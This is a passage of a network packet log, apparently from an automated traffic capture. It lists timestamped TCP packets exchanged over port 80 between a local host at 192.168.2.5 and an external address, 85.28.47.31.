Jul 26, 2024 17:56:06.988346100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988364935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988852024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988863945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988873005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988883018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988893986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988903999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988908052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988913059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988924980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988930941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988934040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988944054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988951921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988954067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988965034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988985062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.989001036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.989020109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.989579916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989589930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989598989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989609003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989619017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989624977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.989629030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989639044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989649057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989655018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989660025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.989660025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989670038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989679098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989681959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.989689112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.989703894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.989726067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.990271091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990283012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990292072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990302086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990312099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990320921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990323067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.990330935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990341902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990345955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.990351915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990376949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.990396023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.990422964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.990776062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990788937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990797997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990809917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990819931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990829945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990837097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.990840912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.990868092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.990895033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026016951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026032925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026043892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026055098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026143074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026177883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026346922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026362896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026374102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026379108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026388884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026400089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026410103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026411057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026438951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026468992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026642084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026653051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026663065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026674032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026684046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026691914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026695967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026714087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026742935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026861906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026878119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026892900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026904106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026910067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026913881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026925087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.026932001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.026967049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.027829885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.027843952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.027853966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.027864933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.027878046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.027908087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.027983904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028000116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028021097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028031111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028036118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028039932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028049946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028059006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028069973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028076887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028081894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028091908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028096914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028101921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028111935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028112888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028120995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028131962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028139114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028141975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028151989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028162003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028162003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028182030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028213978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028455019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028466940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028505087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028531075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028692961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028708935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028717995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028728008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028738976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028748035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028753996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028757095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028758049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.028779030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028795958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.028814077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.030549049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030599117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030606985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.030610085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030644894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.030704021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030705929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.030714035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030724049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030734062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030749083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.030787945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.030922890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030935049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030944109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030953884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030963898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.030976057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031012058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031013012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031184912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031197071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031205893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031215906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031224966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031236887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031235933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031246901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031256914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031261921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031269073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031280041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031296015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031296015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031332970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031687021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031697989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031707048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031712055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031722069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031730890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031739950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031743050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031748056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031759024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031761885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031768084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031783104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.031801939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031821012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.031841993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.032239914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032250881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032258987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032269001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032279015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032289028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032290936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.032298088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032309055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032319069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032324076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.032327890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032337904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032341003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.032346964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032356977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.032366991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.032396078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.033077955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033087969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033097029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033107042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033117056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033127069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033137083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033139944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.033144951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033150911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033159971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033162117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.033169031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033179045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033183098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.033189058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033199072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033209085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033219099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033227921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.033231974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.033231974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.033231974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.033256054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.033288002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.034008026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034018993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034024000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034033060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034051895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034065008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034075022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034084082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034092903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034095049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.034095049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.034102917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034112930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034121990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034125090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.034126043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.034132004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034141064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034151077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.034214020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.034214020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.034970045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034981012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.034989119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035003901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035012960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035022974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035022974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.035032988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035037994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035043955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.035047054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035052061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035056114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035060883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035065889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035065889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.035074949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035088062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035090923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.035098076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035109997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035121918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035130978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.035130978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.035132885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035142899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.035156012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.035191059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.036350965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.036362886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.036370993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.036432981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.036453009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.036494970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.036504984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.036566019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037498951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037511110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037518978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037528992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037545919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037548065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037563086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037573099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037573099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037584066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037592888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037594080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037604094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037612915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037614107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037621975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037631989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037641048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037648916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037650108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037666082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037672997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037672997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037677050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037688017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037695885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037699938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037705898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037715912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037722111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037771940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037807941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037826061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037844896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037853003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037863016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037873030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037874937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037883997 CEST	80	49704	85.28.47.31	192.168.2.5
